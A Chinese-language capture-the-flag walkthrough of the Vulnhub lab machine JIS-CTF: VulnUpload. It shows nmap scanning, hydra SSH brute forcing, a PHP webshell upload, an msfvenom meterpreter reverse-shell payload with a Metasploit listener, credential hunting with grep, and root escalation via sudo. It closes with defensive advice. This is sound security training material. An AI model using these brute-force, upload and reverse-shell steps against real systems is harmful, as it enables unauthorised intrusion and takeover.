JIS-CTF: VulnUpload 靶机渗透测试完整指南<\/h1>

靶机概述<\/h2>
JIS-CTF: VulnUpload 是一个初级难度的 Vulnhub 靶机，包含5个flag，平均完成时间约1.5小时。该靶机运行Ubuntu系统，主要服务包括：<\/p>
SSH (OpenSSH 7.2p2)<\/li>
HTTP (Apache httpd 2.4.18)<\/li> <\/ul>
环境准备<\/h2>
确认靶机IP（通常通过DHCP自动获取）<\/li> <\/ol>
渗透测试流程<\/h2>

1. 目标发现<\/h3>
使用nmap扫描本地网络，发现靶机IP：<\/p>
nmap -sn 192.168.56.0\/24
<\/span><\/span><\/code><\/pre>示例输出：<\/p>
192.168.56.1 - 主系统IP
192.168.56.2 - DHCP服务器
192.168.56.5 - 本机(Kali)
192.168.56.6 - 靶机(JIS)
<\/code><\/pre>
2. 服务枚举<\/h3>
对靶机进行详细扫描：<\/p>
nmap -O -sV 192.168.56.6
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

22\/tcp: OpenSSH 7.2p2<\/li>
80\/tcp: Apache httpd 2.4.18<\/li>
操作系统: Ubuntu<\/li>
<\/ul>
3. 漏洞分析<\/h3>
SSH服务分析<\/h4>

尝试弱口令爆破：<\/li>
<\/ol>
hydra -L common_users.txt -P common_passwords.txt ssh:\/\/192.168.56.6
<\/span><\/span><\/code><\/pre>
搜索已知漏洞：<\/li>
<\/ol>
searchsploit openssh 7.2p2
<\/span><\/span><\/code><\/pre>发现用户名枚举漏洞（但EXP不可靠）<\/p>
Apache服务分析<\/h4>
searchsploit apache 2.4.18
<\/span><\/span><\/code><\/pre>仅发现内存泄漏漏洞，利用价值低<\/p>
4. Web应用渗透<\/h3>
目录枚举<\/h4>


使用Burp Suite的Discover Content功能：<\/p>

设置仅扫描.php扩展名<\/li>
发现重要目录：\/admin_area\/<\/code>, \/uploaded_files\/<\/code><\/li>
<\/ul>
<\/li>

使用dirsearch工具：<\/p>
<\/li>
<\/ol>
python3 dirsearch.py -u http:\/\/192.168.56.6 -e php
<\/span><\/span><\/code><\/pre>关键发现<\/h4>

在\/admin_area\/<\/code>发现第一个flag：<\/li>
<\/ol>
flag{7412574125871236547895214}
<\/code><\/pre>
同时获得凭据：admin\/3v1l_H@ck3r<\/code><\/p>

在\/flag\/<\/code>发现第二个flag：<\/li>
<\/ol>
flag{8734509128730458630012095}
<\/code><\/pre>
文件上传漏洞利用<\/h4>


使用获得的凭据登录\/login.php<\/code><\/p>
<\/li>

上传PHP webshell测试：<\/p>

上传成功但无回显<\/li>
确认上传目录为\/uploaded_files\/<\/code><\/li>
<\/ul>
<\/li>

生成MSF反弹shell：<\/p>
<\/li>
<\/ol>
msfvenom -p php\/meterpreter\/reverse_tcp LHOST=<\/span><your_ip> LPORT=<\/span>4444<\/span> -f raw > shell.php
<\/span><\/span><\/code><\/pre>
设置监听：<\/li>
<\/ol>
msfconsole
<\/span><\/span>use exploit\/multi\/handler
<\/span><\/span>set payload php\/meterpreter\/reverse_tcp
<\/span><\/span>set LHOST <your_ip>
<\/span><\/span>set LPORT 4444<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>
访问上传的shell.php获取meterpreter会话<\/li>
<\/ol>
系统内信息收集<\/h4>


查找flag和提示：<\/p>

\/var\/www\/html\/flag.txt<\/code>（无权限）<\/li>
\/var\/www\/html\/hint.txt<\/code>：
第三个flag: flag{7645110034526579012345670}
提示: 查看flag.txt需要technawi用户的密码
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>

搜索technawi相关信息：<\/p>
<\/li>
<\/ol>
find \/ -name "*technawi*"<\/span> 2>\/dev\/null
<\/span><\/span>grep -r "technawi"<\/span> \/ 2>\/dev\/null
<\/span><\/span><\/code><\/pre>在\/etc\/mysql\/conf.d\/credentials.txt<\/code>发现：<\/p>
第四个flag: flag{7845658974123568974185412}
凭据: technawi\/3vilH@ksor
<\/code><\/pre>
5. 权限提升<\/h3>

使用获得的凭据SSH登录：<\/li>
<\/ol>
ssh technawi@192.168.56.6
<\/span><\/span><\/code><\/pre>
查看flag.txt：<\/li>
<\/ol>
cat \/var\/www\/html\/flag.txt
<\/span><\/span><\/code><\/pre>获得第五个flag：<\/p>
flag{5473215946785213456975249}
<\/code><\/pre>

检查sudo权限：<\/li>
<\/ol>
sudo -l
<\/span><\/span><\/code><\/pre>发现可以使用sudo无需密码<\/p>

提权至root：<\/li>
<\/ol>
sudo su
<\/span><\/span><\/code><\/pre>关键知识点总结<\/h2>

信息收集<\/strong>：nmap扫描、目录枚举、内容发现是渗透测试的基础<\/li>
漏洞利用<\/strong>：文件上传漏洞是常见的Web应用漏洞<\/li>
横向移动<\/strong>：通过发现的凭据在不同服务间尝试登录<\/li>
权限提升<\/strong>：检查sudo权限、SUID文件等常见提权路径<\/li>
工具使用<\/strong>：Burp Suite、dirsearch、msfvenom等工具的综合应用<\/li>
<\/ol>
防御建议<\/h2>

对文件上传功能实施严格的文件类型检查<\/li>
避免在配置文件中存储明文凭据<\/li>
限制sudo权限，避免普通用户无密码提权<\/li>
定期更新服务软件以修复已知漏洞<\/li>
实施最小权限原则，限制每个用户的访问范围<\/li>
<\/ol>
通过这个靶机的完整渗透过程，可以系统性地学习从信息收集到权限提升的完整攻击链，对于理解Web应用安全有很好的帮助。<\/p>